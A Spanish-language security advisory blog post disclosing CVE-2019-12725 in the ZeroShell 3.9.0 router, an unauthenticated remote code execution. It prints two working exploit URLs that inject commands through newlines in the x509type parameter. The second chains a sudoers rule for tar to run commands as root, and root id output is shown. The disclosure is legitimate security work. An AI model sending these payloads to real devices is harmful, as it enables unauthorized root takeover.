Cabecera blog ciberseguridad

Vulnerabilidad en ZeroShell – CVE-2019-12725

Producto: ZeroShell
Fecha de publicación: 17/07/2019
Autor: Juan Manuel Fernandez (@TheXC3LL) – Tarlogic

Vulnerabilidad Zeroshell – CVE-2019-12725 Ejecución remota de código como root

La última versión de ZeroShell linux router (3.9.0) es vulnerable a una ejecución remota de código porque varios parámetros de un script son utilizados sin una validación adecuada. Esta vulnerabilidad puede ser utilizada haciendo uso de caracteres de nueva línea:

Ejemplo de parámetro vulnerable:

/cgi-bin/kerbynet?Section=NoAuthREQ&Action=x509view&User=Admin&x509type=’%0Auname -a%0A’

De forma adicional, el usuario Apache puede ejecutar el comando «tar» como root(/etc/sudoers):

(…)

apache ALL= NOPASSWD: /bin/tar

(…)

exploit de Zeroshell

Esta vulnerabilidad en ZeroShell puede ser utilizada para elevar privilegios a través de la ejecución remota de código:

/cgi-bin/kerbynet?Action=x509view&Section=NoAuthREQ&User=&x509type=’%0A/etc/sudo tar -cf /dev/null /dev/null –checkpoint=1 –checkpoint-action=exec=id%0A’

uid=0(root) gid=0(root) groups=0(root)

Una actualización de seguridad será publicada en la página del fabricante.

Discover our work and cybersecurity services.